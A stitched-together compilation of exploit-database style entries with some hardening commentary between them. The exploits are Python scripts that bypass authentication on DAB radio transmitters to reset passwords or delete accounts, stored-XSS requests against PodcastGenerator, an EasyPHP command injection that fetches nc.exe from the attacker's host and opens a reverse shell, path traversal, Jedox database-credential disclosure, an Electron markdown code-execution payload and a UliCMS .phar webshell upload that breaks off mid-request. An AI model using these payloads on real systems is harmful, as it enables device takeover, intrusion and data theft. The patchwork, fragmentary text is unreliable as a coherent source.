
#!/usr/bin/env python3
#
# Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Password Change
# Exploit Author: LiquidWorm
#
#
# Vendor: DB Elettronica Telecomunicazioni SpA
# Product web page: https://www.screen.it | https://www.dbbroadcast.com
#                   https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
# Affected version: Firmware: 1.9.3
#                   Bios firmware: 7.1 (Apr 19 2021)
#                   Gui: 2.46
#                   FPGA: 169.55
#                   uc: 6.15
#
# Summary: Screen's new radio DAB Transmitter is reaching the highest
# technology level in both Digital Signal Processing and RF domain.
# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
# digital adaptive precorrection and configuration flexibility, the Hot
# Swap System technology, the compactness and the smart system design,
# the SFT DAB are advanced transmitters. They support standards DAB,
# DAB+ and T-DMB and are compatible with major headend brands.
#
# Desc: The application suffers from a weak session management that can
# allow an attacker on the same network to bypass these controls by reusing
# the same IP address assigned to the victim user (NAT) and exploit crucial
# operations on the device itself. By abusing the IP address property that
# is bound to the Session ID, one needs to wait for such an established
# session and issue unauthorized requests to the vulnerable API to manage
# and/or manipulate the affected transmitter.
#
# Tested on: Keil-EWEB/2.1
#            MontaVista® Linux® Carrier Grade eXpress (CGX)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2023-5772
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5772.php
#
#
# 19.03.2023
#

import hashlib,datetime##########
import requests,colorama#########
from colorama import Fore, Style#
colorama.init()
print(Fore.RED+Style.BRIGHT+
    '''
██████  ███████ ███    ███ ██ ███    ██ ██████  ███████ ██████  
██   ██ ██      ████  ████ ██ ████   ██ ██   ██ ██      ██   ██ 
██████  █████   ██ ████ ██ ██ ██ ██  ██ ██   ██ █████   ██████  
██   ██ ██      ██  ██  ██ ██ ██  ██ ██ ██   ██ ██      ██   ██ 
██   ██ ███████ ██      ██ ██ ██   ████ ██████  ███████ ██   ██ 
    '''
    +Style.RESET_ALL)
print(Fore.WHITE+Style.BRIGHT+
    '''
            ZSL and the Producers insist that no one
           submit any exploits of themselfs or others
              performing any dangerous activities.
                 We will not open or view them.
    '''
    +Style.RESET_ALL)
s=datetime.datetime.now()
s=s.strftime('%d.%m.%Y %H:%M:%S')
print('Starting API XPL -',s)
t=input('Enter transmitter ip: ')
u=input('Enter desired username: ')
p=input('Enter desired password: ')
e='/system/api/userManager.cgx'
m5=hashlib.md5()
m5.update(p.encode('utf-8'))
h=m5.hexdigest()
print('Your sig:',h)
print('Calling object: ssbtObj')
print('CGX fastcall: userManager::changeUserPswd')
t='http://'+t+e
bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
    'Accept':'application/json, text/plain, */*',
    'Accept-Language':'ku-MK,en;q=0.9',
    'Accept-Encoding':'gzip, deflate',
    'User-Agent':'Dabber+',
    'Connection':'close'}
j={'ssbtIdx':0,
   'ssbtType':'userManager',
   'ssbtObj':{
             'changeUserPswd':{
                              'username':u,
                              'password':h
                              }
             },
   }
r=requests.post(t,headers=bh,json=j)
if r.status_code==200:
    print('Done.')
else:
    print('Error')
exit(-4)
            
#Exploit Title: PodcastGenerator 3.2.9 - Multiple Stored Cross-Site Scripting (XSS)
#Application: PodcastGenerator
#Version: v3.2.9
#Bugs:  Stored Xss
#Technology: PHP
#Vendor URL: https://podcastgenerator.net/
#Software Link: https://github.com/PodcastGenerator/PodcastGenerator
#Date of found: 14-05-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux 

2. Technical Details & POC
========================================
steps: 

#########XSS -1##############

1. Go to 'Episodes', then 'Upload New Episodes' (http://localhost/PodcastGenerator/admin/episodes_upload.php)
2. Set the title field to <img src=1 onerror=alert("XSS-1")>
3. Go to 'View All Episodes' (http://localhost/PodcastGenerator/admin/episodes_list.php)

payload: <img src=1 onerror=alert("XSS-1")>

poc- request:

POST /PodcastGenerator/admin/episodes_upload.php HTTP/1.1
Host: localhost
Content-Length: 8307
Cache-Control: max-age=0
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3NXAbhxohxCgUFNi
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/PodcastGenerator/admin/episodes_upload.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=b8oeamte4ebbhtu52dgnsrkljn
Connection: close

------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="file"; filename="2023-05-13_2_images.jpeg"
Content-Type: image/jpeg

image content asdfasdfasdfasdfasdfasdfasdfa


------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="title"

<img src=1 onerror=alert("XSS-1")>
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="shortdesc"

fffff
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="date"

2023-05-14
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="time"

11:05
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="episodecover"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="longdesc"


------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="episodenum"


------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="seasonnum"


------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="itunesKeywords"


------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="explicit"

yes
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="authorname"


------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="authoremail"


------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="customtags"


------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="token"

6GnmEMNnhFfyNeTRciGsh8p4R4djazh8
------WebKitFormBoundary3NXAbhxohxCgUFNi--

#########XSS -2##############
1. Go to "Themes and aspect", then "Customize your Freebox" (http://localhost/PodcastGenerator/admin/theme_freebox.php)
2. Set the Freebox content to <script>alert("XSS-2")</script>
3. Go to the home page (http://localhost/PodcastGenerator/)

payload: <script>alert("XSS-2")</script>

poc Request:

POST /PodcastGenerator/admin/theme_freebox.php?change=1 HTTP/1.1
Host: localhost
Content-Length: 96
Cache-Control: max-age=0
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/PodcastGenerator/admin/theme_freebox.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=b8oeamte4ebbhtu52dgnsrkljn
Connection: close

content=%3Cscript%3Ealert%28%22XSS-2%22%29%3C%2Fscript%3E&token=6GnmEMNnhFfyNeTRciGsh8p4R4djazh8

#########XSS -3##############

1. Go to "Podcast Details", then "Change Podcast Details" (http://localhost/PodcastGenerator/admin/podcast_details.php)
2. Set "Podcast title" to <svg/onload=prompt("XSS-3")>
3. Go to the home page (http://localhost/PodcastGenerator/)

payload: <svg/onload=prompt("XSS-3")>
 
poc-request:

POST /PodcastGenerator/admin/podcast_details.php?edit=1 HTTP/1.1
Host: localhost
Content-Length: 300
Cache-Control: max-age=0
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/PodcastGenerator/admin/podcast_details.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=b8oeamte4ebbhtu52dgnsrkljn
Connection: close

podcast_title=%3Csvg%2Fonload%3Dprompt%28%22XSS-3%22%29%3E&podcast_subtitle=dd&podcast_description=dd&copyright=dd&author_name=Podcast+Generator+UserP&author_email=podcastgenerator%40example.com&podcast_guid=&feed_language=en&explicit_podcast=yes&feed_locked=no&token=xVrlAT6NG2ZrbGanycblGYoOOIitXXKC
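All three findings above share one cause: a stored field (episode title, Freebox content, podcast title) is concatenated into the page without output encoding. The following is an added example, not PodcastGenerator's code, showing the unsafe pattern beside context-aware encoding with Python's `html` module; the sample rows are constructed from the payloads quoted in the advisory, and the function names are assumptions.

```python
import html

# Constructed sample rows holding the three payloads quoted in the advisory.
SAMPLE_EPISODES = [
    {"title": '<img src=1 onerror=alert("XSS-1")>', "shortdesc": "fffff", "date": "2023-05-14"},
    {"title": "Episode two", "shortdesc": 'Uses "quotes" & ampersands', "date": "2023-05-15"},
]
SAMPLE_FREEBOX = '<script>alert("XSS-2")</script>'
SAMPLE_PODCAST_TITLE = '<svg/onload=prompt("XSS-3")>'


def text(value):
    """Encode a value that lands between tags (element content)."""
    return html.escape(str(value), quote=False)


def attr(value):
    """Encode a value that lands inside a double-quoted attribute; the quotes
    must be encoded here, otherwise the attribute can be closed early."""
    return html.escape(str(value), quote=True)


def render_home_unsafe(podcast_title, freebox):
    # The pattern behind all three findings: stored input concatenated into HTML.
    return f'<h1>{podcast_title}</h1>\n<div class="freebox">{freebox}</div>'


def render_home(podcast_title, freebox):
    """Same page, with every stored value encoded for the context it lands in."""
    return f'<h1>{text(podcast_title)}</h1>\n<div class="freebox">{text(freebox)}</div>'


def render_episode_list(episodes):
    """Episode table: titles go into element content, the short description
    into a title attribute, so each gets the encoder for its context."""
    rows = [
        f'<tr><td title="{attr(ep["shortdesc"])}">{text(ep["title"])}</td>'
        f'<td>{text(ep["date"])}</td></tr>'
        for ep in episodes
    ]
    return "<table>" + "".join(rows) + "</table>"
```

The Freebox is designed to hold admin-supplied HTML, so fully encoding it removes the feature; where raw markup must be allowed, the write path needs strict access control and the content should pass through an allowlist HTML sanitizer rather than plain escaping. A Content-Security-Policy without `unsafe-inline` would additionally stop the inline handlers and script block shown above from executing even if encoding is missed somewhere.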
            
#!/usr/bin/env python3
#
# Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Erase Account
# Exploit Author: LiquidWorm
#
#
# Vendor: DB Elettronica Telecomunicazioni SpA
# Product web page: https://www.screen.it | https://www.dbbroadcast.com
#                   https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
# Affected version: Firmware: 1.9.3
#                   Bios firmware: 7.1 (Apr 19 2021)
#                   Gui: 2.46
#                   FPGA: 169.55
#                   uc: 6.15
#
# Summary: Screen's new radio DAB Transmitter is reaching the highest
# technology level in both Digital Signal Processing and RF domain.
# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
# digital adaptive precorrection and configuration flexibility, the Hot
# Swap System technology, the compactness and the smart system design,
# the SFT DAB are advanced transmitters. They support standards DAB,
# DAB+ and T-DMB and are compatible with major headend brands.
#
# Desc: The application suffers from a weak session management that can
# allow an attacker on the same network to bypass these controls by reusing
# the same IP address assigned to the victim user (NAT) and exploit crucial
# operations on the device itself. By abusing the IP address property that
# is bound to the Session ID, one needs to wait for such an established
# session and issue unauthorized requests to the vulnerable API to manage
# and/or manipulate the affected transmitter.
#
# Tested on: Keil-EWEB/2.1
#            MontaVista® Linux® Carrier Grade eXpress (CGX)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2023-5773
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5773.php
#
#
# 19.03.2023
#

import hashlib,datetime##########
import requests,colorama#########
from colorama import Fore, Style#
colorama.init()
print(Fore.RED+Style.BRIGHT+
    '''
██████  ███████ ███    ███ ██ ███    ██ ██████  ███████ ██████  
██   ██ ██      ████  ████ ██ ████   ██ ██   ██ ██      ██   ██ 
██████  █████   ██ ████ ██ ██ ██ ██  ██ ██   ██ █████   ██████  
██   ██ ██      ██  ██  ██ ██ ██  ██ ██ ██   ██ ██      ██   ██ 
██   ██ ███████ ██      ██ ██ ██   ████ ██████  ███████ ██   ██ 
    '''
    +Style.RESET_ALL)
print(Fore.WHITE+Style.BRIGHT+
    '''
            ZSL and the Producers insist that no one
           submit any exploits of themselfs or others
              performing any dangerous activities.
                 We will not open or view them.
    '''
    +Style.RESET_ALL)
s=datetime.datetime.now()
s=s.strftime('%d.%m.%Y %H:%M:%S')
print('Starting API XPL -',s)
t=input('Enter transmitter ip: ')
u=input('Enter desired username: ')
e='/system/api/userManager.cgx'
print('Calling object: ssbtObj')
print('CGX fastcall: userManager::removeUser')
t='http://'+t+e
bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
    'Accept':'application/json, text/plain, */*',
    'Accept-Language':'ku-MK,en;q=0.9',
    'Accept-Encoding':'gzip, deflate',
    'User-Agent':'Dabber-',
    'Connection':'close'}
j={'ssbtIdx':0,
   'ssbtType':'userManager',
   'ssbtObj':{
             'removeUser':u
             }
   }
r=requests.post(t,headers=bh,json=j)
if r.status_code==200:
    print('Done.')
else:
    print('Error')
exit(-3)
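Both ZSL advisories above (ZSL-2023-5772 and ZSL-2023-5773) describe the same weakness: the device treats the client IP as the session identity, so behind NAT every host sharing the address inherits an administrator's session. The following is an added example, not the vendor's firmware or the advisory author's code, contrasting that IP-bound model with a session store keyed on an unguessable bearer token that also expires on inactivity. The class and function names, the `10.0.0.5` address and the request shape are constructed for illustration; the operation names `changeUserPswd` and `removeUser` are the ones from the advisories.

```python
import secrets
import time

SESSION_TTL = 900          # seconds of inactivity after which a session is dropped
PRIVILEGED_OPS = {"changeUserPswd", "removeUser"}   # operation names from the advisories above


class IpBoundSessions:
    """The weak model the advisories describe: after login the server remembers
    the client IP, and every later request from that IP is treated as the
    logged-in user. Behind NAT every host sharing the address inherits it."""

    def __init__(self):
        self._by_ip = {}

    def login(self, ip, user):
        self._by_ip[ip] = user
        return None                      # nothing unguessable is issued to the client

    def user_for(self, ip, cookie=None):
        return self._by_ip.get(ip)       # the cookie, if any, is ignored


class TokenBoundSessions:
    """Hardened model: the session is identified only by a random bearer token
    issued at login and carried in a cookie; the source IP plays no part.
    Idle sessions expire, so a stale token cannot be replayed indefinitely."""

    def __init__(self, clock=time.time):
        self._by_token = {}
        self._clock = clock

    def login(self, ip, user):
        token = secrets.token_urlsafe(32)        # 256 bits from the OS CSPRNG
        self._by_token[token] = {"user": user, "last": self._clock()}
        return token

    def user_for(self, ip, cookie=None):
        entry = self._by_token.get(cookie) if cookie else None
        if entry is None:
            return None
        now = self._clock()
        if now - entry["last"] > SESSION_TTL:
            del self._by_token[cookie]
            return None
        entry["last"] = now
        return entry["user"]


def authorize(store, request):
    """Decide who may run the userManager operation in `request`
    (a constructed dict with keys ip, cookie, op). Returns the user or None."""
    user = store.user_for(request["ip"], request.get("cookie"))
    if user is None:
        return None
    if request["op"] in PRIVILEGED_OPS and user != "admin":
        return None
    return user


def nat_scenario(store_cls):
    """An admin logs in from the NAT address 10.0.0.5 (constructed); a second
    host behind the same NAT then posts removeUser with no cookie at all.
    Returns (admin_result, other_host_result)."""
    store = store_cls()
    cookie = store.login("10.0.0.5", "admin")
    admin_request = {"ip": "10.0.0.5", "cookie": cookie, "op": "removeUser"}
    other_host = {"ip": "10.0.0.5", "cookie": None, "op": "removeUser"}
    return authorize(store, admin_request), authorize(store, other_host)


def idle_expiry():
    """Show the inactivity timeout with an injectable clock."""
    now = [1_000.0]
    store = TokenBoundSessions(clock=lambda: now[0])
    token = store.login("10.0.0.5", "admin")
    now[0] += SESSION_TTL + 1
    return store.user_for("10.0.0.5", token)
```

With `IpBoundSessions` the second host is authorised as `admin` although it never logged in; with `TokenBoundSessions` it is refused, and the admin's own token stops working after the idle period. A bearer token in a cookie still needs `HttpOnly`, `Secure` and `SameSite` attributes plus a CSRF check on state-changing calls such as `changeUserPswd`, since the point is that nothing observable on the network path (address or otherwise) should stand in for the credential.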
            
# Exploit Title: EasyPHP Webserver 14.1 - Multiple Vulnerabilities (RCE and Path Traversal)
# Discovery by: Rafael Pedrero
# Discovery Date: 2022-02-06
# Vendor Homepage: https://www.easyphp.org/
# Software Link : https://www.easyphp.org/
# Tested Version: 14.1
# Tested on:  Windows 7 and 10

# Vulnerability Type: Remote Command Execution (RCE)

CVSS v3: 9.8
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-78

Vulnerability description: There is an OS Command Injection in EasyPHP
Webserver 14.1 that allows an attacker to achieve Remote Code Execution
(RCE) with administrative privileges.

Proof of concept:

To detect:

POST http://127.0.0.1:10000/index.php?zone=settings HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 28
Origin: http://127.0.0.1:10000
Connection: keep-alive
Referer: http://127.0.0.1:10000/index.php?zone=settings
Host: 127.0.0.1:10000

app_service_control=calc.exe

The calculator opens.

Exploit:

#!/usr/bin/python3
import requests
import sys

if len(sys.argv) != 5:
    print("RCE: EasyPHP Webserver 14.1 and before - by Rafa")
    print("Usage:   %s <TARGET> <TARGET_PORT> <LOCAL_IP> <LOCAL_PORT>" % sys.argv[0])
    print("Example:   %s 192.168.1.10 10000 192.168.1.11 9001" % sys.argv[0])
    exit(1)

else:
    target = sys.argv[1]
    targetport = sys.argv[2]
    localip = sys.argv[3]
    localport = sys.argv[4]
    # python3 -m http.server / python2 -m SimpleHTTPServer with nc.exe in the directory

    payload = ("powershell+-command+\"((new-object+System.Net.WebClient).DownloadFile('http://"
               + localip + ':8000'
               + "/nc.exe','%TEMP%\\nc.exe'))\";\"c:\\windows\\system32\\cmd.exe+/c+%TEMP%\\nc.exe+"
               + localip + "+" + localport + "+-e+cmd.exe\"")
    print(payload)
    url = 'http://' + target + ':' + targetport + '/index.php?zone=settings'
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4433.0 Safari/537.36"
    }
    data = {'app_service_control': payload}

    try:
        # The injected command keeps the request open, so a read timeout is the expected outcome
        r = requests.post(url, headers=headers, data=data, timeout=10)
    except requests.exceptions.ReadTimeout:
        print("The payload has been sent. Check it!")


# Vulnerability Type: Path Traversal

CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
CWE: CWE-22

Vulnerability description: An issue was discovered in EasyPHP Webserver
14.1. An Absolute Path Traversal vulnerability in / allows remote users to
bypass the intended SecurityManager restrictions and download any file outside
the configured document root that the server process has permission to read.

Proof of concept:

GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini HTTP/1.1
Host: 192.168.X.X:10000
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

HTTP/1.1 200 OK
Host: 192.168.X.X:10000
Connection: close
Content-Type: application/octet-stream
Content-Length: 499

; for 16-bit app support [fonts] [extensions] [mci extensions] [files]
[Mail] MAPI=1 CMCDLLNAME32=mapi32.dll CMCDLLNAME=mapi.dll CMC=1 MAPIX=1
MAPIXVER=1.0.0.1 OLEMessaging=1 [MCI Extensions.BAK] 3g2=MPEGVideo
3gp=MPEGVideo 3gp2=MPEGVideo 3gpp=MPEGVideo aac=MPEGVideo adt=MPEGVideo
adts=MPEGVideo m2t=MPEGVideo m2ts=MPEGVideo m2v=MPEGVideo m4a=MPEGVideo
m4v=MPEGVideo mod=MPEGVideo mov=MPEGVideo mp4=MPEGVideo mp4v=MPEGVideo
mts=MPEGVideo ts=MPEGVideo tts=MPEGVideo
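The two EasyPHP findings above are the classic pair: a request parameter (`app_service_control`) handed to a shell, and a request path that is served after only a superficial check, so `..%5c` sequences walk out of the document root. The following is an added example, not EasyPHP's code, of the two server-side checks that close them: a fixed allowlist for the service-control value, and path resolution that decodes, normalises and then compares against the document root instead of pattern-matching for `..`. It also runs the path check over constructed access-log lines to flag past traversal attempts. `DOCROOT`, the allowlist contents and the log format are assumptions.

```python
import posixpath
from urllib.parse import unquote

DOCROOT = "/srv/easyphp/www"                            # assumed document root (illustration only)
ALLOWED_SERVICE_ACTIONS = {"start", "stop", "restart"}  # assumed fixed vocabulary


def service_action(value):
    """Map the user-controlled app_service_control value onto one of a fixed
    set of actions. The raw value is never handed to a shell; anything outside
    the allowlist is refused with an exception the caller can log."""
    action = value.strip().lower()
    if action not in ALLOWED_SERVICE_ACTIONS:
        raise ValueError(f"unsupported service action: {value!r}")
    return action


def rejects_service_action(value):
    """Convenience wrapper: True if the value would be refused."""
    try:
        service_action(value)
    except ValueError:
        return True
    return False


def resolve_request_path(raw_path, docroot=DOCROOT):
    """Return the absolute file path a request path maps to, or None if the
    path would leave docroot. Decodes twice (double encoding), treats
    backslashes as separators (the %5c trick above), rejects NUL bytes, and
    checks the normalised result against docroot rather than searching for
    '..' in the raw string."""
    path = raw_path.split("?", 1)[0]          # the query string is not part of the file path
    for _ in range(2):
        path = unquote(path)
    if "\x00" in path:
        return None
    path = path.replace("\\", "/")            # Windows accepts both separators
    root = posixpath.normpath(docroot)
    candidate = posixpath.normpath(posixpath.join(root, path.lstrip("/")))
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


# Constructed access-log lines in a minimal "METHOD PATH STATUS" shape.
SAMPLE_ACCESS_LOG = [
    "GET /index.php?zone=settings 200",
    "GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini 200",
    "GET /css/%2e%2e/index.php 200",
    "GET /%252e%252e/%252e%252e/boot.ini 200",
]


def flag_traversal(lines):
    """Return the request paths from the sample log that escape docroot.
    A 200 status on such a line means the server actually served the file."""
    flagged = []
    for line in lines:
        _method, path, _status = line.split(" ", 2)
        if resolve_request_path(path) is None:
            flagged.append(path)
    return flagged
```

Rejecting rather than silently clamping at the root keeps traversal attempts visible: the refused request can be logged and alerted on, which is exactly what `flag_traversal` does offline over the sample lines.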
            
HireHackking
# Exploit Title: Jedox 2020.2.5 - Disclosure of Database Credentials via Improper Access Controls
# Date: 28/04/2023
# Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL
# Vendor Homepage: https://jedox.com
# Version: Jedox 2020.2 (20.2.5) and older
# CVE : CVE-2022-47874

Introduction
=================

Improper access controls in `/tc/rpc` allow remote authenticated users to view details of database connections via the class `com.jedox.etl.mngr.Connections` and the method `getGlobalConnection`. To exploit the vulnerability, the attacker must know the name of the database connection.

Write-Up
=================

See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit the vulnerability.

Proof of Concept
=================

1) List all available database connections via `conn::ls` (see also: CVE-2022-47879):

PATH: /be/rpc.php
METHOD: POST
BODY:
[
  [
    "conn",
    "ls",
    [
      null,
      false,
      true,
      [
        "type",
        "active",
        "description"
      ]
    ]
  ]
]

2) Retrieve details of a database connection (specify the connection name via CONNECTION), including encrypted credentials, using the Java RPC function `com.jedox.etl.mngr.Connection::getGlobalConnection`:

PATH: /tc/rpc
METHOD: POST
BODY:
[
  [
    "com.jedox.etl.mngr.Connections",
    "getGlobalConnection",
    [
      "<CONNECTION>"
    ]
  ]
]
Codigo Markdown Editor v1.0.1 (Electron) - Remote Code Execution

# Exploit Title: Codigo Markdown Editor v1.0.1 (Electron) - Arbitrary Code Execution
# Date: 2023-05-03
# Exploit Author: 8bitsec
# Vendor Homepage: https://alfonzm.github.io/codigo/
# Software Link: https://github.com/alfonzm/codigo-app
# Version: 1.0.1
# Tested on: [Mac OS 13]

Release Date:
=============
2023-05-03

Product & Service Introduction:
===============================
A Markdown editor & notes app made with Vue & Electron

Technical Details & Description:
================================
A vulnerability was discovered in Codigo markdown editor v1.0.1 allowing a user to execute arbitrary code by opening a specially crafted file.

Proof of Concept (PoC):
=======================
Arbitrary code execution:

Create a markdown file (.md) in any text editor and write the following payload:

<video><source onerror="alert(require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());">

Opening the file in Codigo will auto execute the Calculator application.
Ulicms-2023.1 sniffing-vicuna - Remote Code Execution (RCE)

#Exploit Title: Ulicms-2023.1 sniffing-vicuna - Remote Code Execution (RCE)
#Application: Ulicms
#Version: 2023.1-sniffing-vicuna
#Bugs: RCE
#Technology: PHP
#Vendor URL: https://en.ulicms.de/
#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip
#Date of found: 04-05-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux

2. Technical Details & POC
========================================
steps:

1. Log in to an account and edit the profile.
2. Upload a new avatar.
3. It is possible to submit a PHP file with the .phar extension in place of the image. The RCE is triggered when the file is visited again. A file upload error may occur, but this does not mean that the file was not uploaded; the file location is shown in the error.

payload: <?php echo system("cat /etc/passwd"); ?>

poc request:

POST /dist/admin/index.php HTTP/1.1
Host: localhost
Content-Length: 1982
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYB7QS1BMMo1CXZVy
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/dist/admin/index.php?action=admin_edit&id=12&ref=home
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: 64534366316f0_SESSION=g9vdeh7uafdagkn6l8jdk2delv
Connection: close

------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="csrf_token"

e2d428bc0585c06c651ca8b51b72fa58
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="sClass"

UserController
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="sMethod"

update
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="avatar"; filename="salam.phar"
Content-Type: application/octet-stream

<?php echo system("cat /etc/passwd"); ?>
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="edit_admin"

edit_admin
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="id"

12
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="firstname"

account1
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="lastname"

account1
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="email"

account1@test.com
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="password"


------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="password_repeat"


------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="group_id"

1
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="secondary_groups[]"

1
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="homepage"


------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="html_editor"

ckeditor
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="admin"

1
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="default_language"


